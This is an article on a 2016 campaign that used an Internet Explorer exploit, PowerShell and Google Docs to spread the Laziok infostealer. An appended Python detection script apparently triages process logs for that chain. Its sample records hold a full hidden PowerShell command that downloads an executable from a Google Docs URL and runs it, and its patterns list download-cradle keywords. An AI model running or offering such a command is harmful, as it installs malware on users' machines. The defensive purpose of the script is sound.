Windows PowerShell and Google Docs Abused to Spread Laziok Trojan
During the month of March 2016, a threat group used a combination of exploits in Internet Explorer, the no-limits scripting of Windows PowerShell, and malware stored on Google Docs to infect targets with the Laziok trojan.

The Laziok trojan surfaced on the malware scene in March 2015, when Symantec observed cyber-espionage groups using it to spy on companies from the energy sector in countries from the Middle East.

Laziok is a simple infostealer, regularly used in reconnaissance campaigns when threat groups are gathering information on their target to use in attacks at a later stage.
"Attack starts with malicious JavaScript code hosted on a Polish server"

Malware analysts from security firm FireEye stumbled upon this threat while sifting through telemetry data, and say that in this particular distribution campaign, crooks were using malicious JavaScript hosted on a Polish server.

When a victim using the Internet Explorer browser would get tricked into accessing a page hosting the malicious code, an exploit would execute, leverage the CVE-2014-6332 vulnerability, and execute VBScript via Internet Explorer.

All IE versions from 3 to 11 are vulnerable, and the crooks would enter a so-called GodMode on the user's machine. From here, the crooks would use Windows PowerShell scripts to download the Laziok executable from a Google Docs URL.
"Laziok is a perfect reconnaissance tool"

Laziok is installed, and the trojan immediately starts collecting information on its targets. The infostealer would collect information on the computer's name, CPU details, RAM size, location (country), and whether the user had any antivirus software installed.

The data would then be sent to the crooks' servers, where it will probably be used in other attacks if they haven't happened yet.

Security researchers found it extremely curious that crooks managed to host Laziok on Google's servers. Google is known to run automated virus scans on all the files hosted on its servers.
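The detection side of the chain described in the post above (Internet Explorer spawning PowerShell, which then downloads a payload from a Google Docs URL), as an added Python example that is not part of the original post or article. It triages process-creation records for that combination; the record field names, the sample command lines and the placeholder Google Docs id are constructed assumptions, and docs.google.com / drive.google.com are taken as the file-hosting domains the post refers to.

```python
"""Triage PowerShell process-creation records for the chain in the post:
a browser-spawned PowerShell that fetches a payload from a Google Docs /
Drive URL. SAMPLE_EVENTS below are constructed, not real telemetry."""
import re
from urllib.parse import urlparse

# Hosts the post names as the payload location (assumed set; extend as needed).
CLOUD_FILE_HOSTS = {"docs.google.com", "drive.google.com"}
# Browsers that have no normal reason to spawn a scripting interpreter.
BROWSER_PARENTS = {"iexplore.exe"}
# Common PowerShell download / execute primitives.
CRADLE_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
    r"start-bitstransfer|invoke-expression|\biex\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"\)]+", re.I)
# Flags that hide the window or skip profiles, typical of unattended scripts.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)

# Constructed sample records: parent process, image, full command line.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "iexplore.exe", "image": "powershell.exe",
     "cmd": "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
            "'https://docs.google.com/uc?export=download&id=PLACEHOLDER_ID',"
            "'C:\\Users\\Public\\svc.exe'); Start-Process C:\\Users\\Public\\svc.exe\""},
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -Command Get-ChildItem C:\\Logs"},
    {"id": 3, "parent": "cmd.exe", "image": "powershell.exe",
     "cmd": "powershell -c Invoke-WebRequest -Uri https://updates.example.com/tool.zip"
            " -OutFile tool.zip"},
]


def find_indicators(event):
    """Return the names of the indicators that fire on one record, in a fixed order."""
    cmd = event["cmd"]
    hits = []
    if event["parent"].lower() in BROWSER_PARENTS:
        hits.append("browser_parent")
    if CRADLE_RE.search(cmd):
        hits.append("download_cradle")
    for url in URL_RE.findall(cmd):
        host = (urlparse(url).hostname or "").lower()
        if host in CLOUD_FILE_HOSTS:
            hits.append("cloud_file_host")
            break
    if HIDDEN_RE.search(cmd):
        hits.append("stealth_flags")
    return hits


def severity(hits):
    """Rate a record: the full post chain is 'high'; a lone download is only 'low'."""
    core = {"browser_parent", "download_cradle", "cloud_file_host"}
    if core <= set(hits):
        return "high"
    if "download_cradle" in hits and len(hits) >= 2:
        return "medium"
    return "low" if hits else "none"


def triage(events):
    """Score every record and return one summary dict per record."""
    results = []
    for event in events:
        hits = find_indicators(event)
        results.append({"id": event["id"], "indicators": hits,
                        "severity": severity(hits)})
    return results


if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

Record 1 fires all four indicators and rates "high"; record 3 is an ordinary download from a non-cloud host and rates "low", which keeps admin scripts from drowning out the browser-to-PowerShell-to-Google-Docs pattern the post describes. In a real pipeline the records would come from Sysmon event 1 or Security event 4688 with command-line auditing enabled.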